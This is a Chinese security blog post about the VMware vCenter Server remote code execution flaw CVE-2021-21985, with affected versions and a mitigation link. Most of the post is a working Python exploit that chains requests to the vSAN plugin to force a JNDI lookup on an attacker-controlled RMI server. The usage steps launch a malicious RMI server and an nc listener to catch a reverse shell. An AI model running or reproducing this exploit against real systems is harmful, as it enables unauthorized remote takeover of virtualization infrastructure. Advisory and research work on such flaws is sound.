网络攻防

VMware vCenter Server 远程代码执行漏洞CVE-2021-21985

VMware vCenter Server 远程代码执行漏洞

Posted by hackeyes on June 8, 2021

漏洞详情

2021年5月25日,VMware 官方发布安全公告,披露了 VMware vCenter Server远程代码执行漏洞(CVE-2021-21985)、VMware vCenter Server 插件权限绕过漏洞(CVE-2021-21986 )。

攻击者可构造恶意请求,通过vCenter中的默认开启的Virtual SAN Health Check插件造成远程代码执行漏洞。腾讯安全专家提醒 VMware 用户尽快采取安全措施阻止漏洞攻击。

VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。

受影响版本

VMware vCenter Server 7.0系列 < 7.0.U2b

VMware vCenter Server 6.7系列 < 6.7.U3n

VMware vCenter Server 6.5系列 < 6.5 U3p

VMware Cloud Foundation 4.x 系列 < 4.2.1

VMware Cloud Foundation 4.x 系列 < 3.10.2.1

修复建议

1、升级VMware vCenter Server 至最新版本。

2、针对 CVE-2021-21985 VMware vCenter Server 远程代码漏洞,可按照 https://kb.vmware.com/s/article/83829 相关措施进行缓解

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

import requests
import sys
import json
def send_request(host,uri,json):
    try:
        req = requests.post(url=host+baseuri+uri,json=json,headers=headers,verify=False)
        return req.text
    except:
        return False
def check_false(request):
    if request ==False or 'result' not in request:
        print("[*] No Vuln!")
        return True
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('''python3 cve-2021-21985.py https://host rmi://8.8.8.8:1099/Exploit''')
        sys.exit()
    host = sys.argv[1]
    payload = sys.argv[2]
    baseuri = "/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService"
    uris = ["/setTargetObject", "/setStaticMethod", "/setTargetMethod", "/setArguments", "/prepare", "/invoke"]
    headers = {'Content-Type': 'application/json', "User-Agent": "pentest"}
    stage_setTargetObject = json.loads('{"methodInput":[null]}')
    stage_setStaticMethod = json.loads('{"methodInput":["javax.naming.InitialContext.doLookup"]}')
    stage_setTargetMethod = json.loads('{"methodInput":["doLookup"]}')
    stage_setArguments = json.loads('{"methodInput":[["%s"]]}'%payload)
    stage_prepare = json.loads('{"methodInput":[]}')
    print("[*] start init TargetObject")
    # init TargetObject
    init_request  = send_request(host,uris[0],json=stage_setTargetObject)
    if check_false(init_request):
        print("[*] init failed!")
        exit()
    # Step2 setStaticMethod
    StaticMethod = send_request(host,uris[1],json=stage_setStaticMethod)
    if check_false(init_request):
        print("[*] StaticMethod init failed!")
        exit()
    # Step3 setTargetMethod
    StaticMethod = send_request(host,uris[2],json=stage_setTargetMethod)
    if check_false(init_request):
        print("[*] setTarget Method failed!")
        exit()
    # Step4 setArguments
    # print(stage_setArguments)
    setArguments = send_request(host,uris[3],json=stage_setArguments)
    if check_false(init_request):
        print("[*] setArguments failstage_setArgumentsed!")
        exit()
    # Step5 prepare
    setArguments = send_request(host,uris[4],json=stage_prepare)
    if check_false(init_request):
        print("[*] stage_prepare failed!")
        exit()
    # Step6 invoke
    setArguments = send_request(host,uris[5],json=stage_prepare)
    if check_false(init_request):
        print("[*] invoke failed!")
        exit()

验证方式

1.启动rmi服务 java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer attip

2.启动reverse shell监听,nc -lvvp port

3.执行payload 得到reverse shell

CVE-2021-21985

FEATURED TAGS
网络攻防 网络安全 code
FRIENDS
本站总访问量